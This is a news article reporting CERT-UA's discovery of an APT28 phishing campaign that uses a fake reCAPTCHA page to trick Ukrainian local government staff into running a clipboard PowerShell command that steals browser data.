Ukraine Confronts New Cyberattack Vector from Russian GRU-Linked Hackers

Ukraine is facing a new cyberattack threat from Russian military intelligence (GRU) linked hackers targeting local governments. The Computer Emergency Response Team of Ukraine (CERT-UA) uncovered an advanced phishing campaign by the Russian GRU-linked APT28, also known as “Fancy Bear.” This campaign utilizes a unique approach where attackers trick recipients into executing malicious PowerShell commands directly from their clipboard, a method that requires minimal interaction.

The emails flagged by CERT-UA were found circulating within local government offices under the guise of “Table Replacement.” Instead of traditional attachments, these emails contain a link that mimics a Google spreadsheet. Upon clicking the link, users are presented with a fake Google reCAPTCHA screen, which copies a malicious PowerShell command to the user’s clipboard without their knowledge.

Subsequently, users are instructed to execute the command by pressing specific keys, leading to the launch of a payload that compromises the system. This tactic demonstrates how APT28 leverages routine tasks and user trust to conceal their malicious intentions.

The CERT-UA analysis revealed that the malicious PowerShell command initiates a sequence that downloads and executes a malicious HTML application called “browser.hta.” This application then runs a PowerShell script designed to steal data from popular browsers and uses an SSH tunnel for data exfiltration to the attackers.

This recent attack is not the first time Ukrainian entities have been targeted by APT28. In a previous incident, the group exploited a Roundcube email vulnerability to redirect email data, compromising government email accounts and transmitting further exploits to Ukrainian defense contacts.

With APT28’s evolving tactics and infrastructure, CERT-UA has advised government agencies to remain vigilant against targeted spear-phishing campaigns that exploit user trust and routine tasks. The indicators of compromise shared by CERT-UA provide valuable insights for organizations to enhance their cybersecurity defenses against such sophisticated threats.

Russian Hackers Trojanize ReCAPTCHA to Target Ukraine

Ukraine Confronts New Cyberattack Vector from Russian GRU-Linked Hackers

Related articles

Cyble Reports New Stealthy Strela Stealer Bypassing Security Measures

Proofpoint Enhances Data Security Through Acquisition of Normalyze

Enhancing Security Measures for Critical Infrastructure against Cyber Threats

Recent articles

Cyble Reports New Stealthy Strela Stealer Bypassing Security Measures

Rohit Khubchandani discusses Oosto’s Vision AI Solutions in the Middle East

Study finds AI is screwing over Sinatra and Cobain

Elon Musk’s Disapproval of ‘Woke AI’ Raises Concerns About ChatGPT Looming as Potential Target for Trump Administration

Latest Updates

Cyble Reports New Stealthy Strela Stealer Bypassing Security Measures

Rohit Khubchandani discusses Oosto’s Vision AI Solutions in the Middle East

Study finds AI is screwing over Sinatra and Cobain

Elon Musk’s Disapproval of ‘Woke AI’ Raises Concerns About ChatGPT Looming as Potential Target for Trump Administration